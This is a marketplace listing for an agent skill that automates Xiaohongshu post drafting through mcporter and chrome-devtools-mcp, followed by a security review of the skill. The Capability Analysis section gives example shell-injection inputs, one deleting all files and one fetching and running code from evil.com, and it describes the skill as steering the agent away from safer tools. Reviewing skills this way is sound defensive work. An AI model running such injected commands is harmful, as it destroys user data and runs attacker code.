← Back to Skills Marketplace
1200
Downloads
1
Stars
7
Active Installs
1
Versions
Install in OpenClaw
/install xiaohongshu-mcporter-publish
Description
小红书创作者平台写帖子:mcporter 调用 chrome-devtools-mcp 操作浏览器,禁止 browser 工具。上传图片、填写标题正文,发布由用户手动完成。
Usage Guidance
This skill appears coherent, but take these practical precautions before installing: 1) Verify the mcporter binary on your system is legitimate and from a trusted source — the skill will invoke it to control your browser. 2) Be aware the agent will run filesystem commands (ls) and access files under the specified Desktop folder to find images — don't store sensitive files in that folder. 3) If you want tighter control, ask the skill author or maintainer for the exact mcporter/devtools commands it will run, or run it manually the first time to observe behavior. 4) Note that the final 'publish' step is left to the user, so posts won't be published automatically without your confirmation.
Capability Analysis
Type: OpenClaw Skill
Name: xiaohongshu-mcporter-publish
Version: 1.0.0
The `SKILL.md` file contains a significant prompt injection vulnerability by explicitly instructing the AI agent to execute `ls` on user-controlled paths (e.g., `~/Desktop/XX`). This pattern allows for shell injection, potentially leading to arbitrary command execution if a malicious user crafts input like `$(rm -rf /)` or `$(curl evil.com|bash)`. Additionally, the repeated instruction to "禁止 browser 工具" (disable browser tool) is suspicious, as it attempts to steer the agent away from its potentially safer, built-in browser automation tools.
Capability Assessment
Purpose & Capability
The skill's name/description say it will automate Xiaohongshu publishing using mcporter -> chrome-devtools-mcp. Declaring mcporter as a required binary matches that purpose. No unrelated environment variables, credentials, or config paths are requested.
Instruction Scope
The SKILL.md tells the agent to use mcporter to control the browser and to list (ls) a user Desktop folder to locate images for upload. Reading the Desktop to find images is proportional to the task, but the instructions are minimal/ambiguous about exact mcporter commands and give the agent discretion to run devtools operations. A positive control is that final 'publish' is explicitly left to the user, preventing fully automatic posting.
Install Mechanism
This is an instruction-only skill with no install spec and no code files — lowest-risk delivery method. It relies on an existing mcporter binary being present rather than downloading code.
Credentials
No environment variables, credentials, or config paths are requested. Requiring only mcporter is proportionate to a browser-automation publishing task.
Persistence & Privilege
always is false, the skill is user-invocable, and it does not request persistent presence or modify other skill/system configs. Model invocation is allowed (the platform default) but not combined with other concerning flags.
How to Use
- Make sure OpenClaw is installed (local or Docker)
- Run the install command in chat:
/install xiaohongshu-mcporter-publish - After installation, invoke the skill by name or use
/xiaohongshu-mcporter-publish - Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
Initial release
Metadata
Frequently Asked Questions
What is 小红书图文发布?
小红书创作者平台写帖子:mcporter 调用 chrome-devtools-mcp 操作浏览器,禁止 browser 工具。上传图片、填写标题正文,发布由用户手动完成。 It is an AI Agent Skill for Claude Code / OpenClaw, with 1200 downloads so far.
How do I install 小红书图文发布?
Run "/install xiaohongshu-mcporter-publish" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.
Is 小红书图文发布 free?
Yes, 小红书图文发布 is completely free (open-source). You can download, install and use it at no cost.
Which platforms does 小红书图文发布 support?
小红书图文发布 is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).
Who created 小红书图文发布?
It is built and maintained by YEWENWU1 (@yewenwu1); the current version is v1.0.0.
More Skills